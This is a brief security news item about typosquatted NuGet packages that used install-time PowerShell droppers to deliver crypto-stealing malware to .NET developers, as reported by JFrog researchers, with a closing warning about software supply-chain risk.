Security News > 2023 > March > Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware

"The packages contained a PowerShell script that would execute upon installation and trigger a download of a 'second stage' payload, which could be remotely executed," JFrog researchers Natan Nehorai and Brian Moussalli said.

While NuGet packages have been in the past found to contain vulnerabilities and be abused to propagate phishing links, the development marks the first-ever discovery of packages with malicious code.

The use of Coinbase and Discord underscores the continued reliance on typosquatting techniques, in which fake packages are assigned names that are similar to legitimate packages, in order to trick developers into downloading them.

The malware incorporated within the software packages functions as a dropper script and is designed to automatically run a PowerShell code that retrieves a follow-on binary from a hard-coded server.

As an added obfuscation mechanism, some packages did not embed a malicious payload directly, instead fetching it via another booby-trapped package as a dependency.

NET developers using NuGet are still at high risk of malicious code infecting their environments and should take caution when curating open-source components for use in their builds - and at every step of the software development lifecycle - to ensure the software supply chain remains secure.

News URL

https://thehackernews.com/2023/03/rogue-nuget-packages-infect-net.html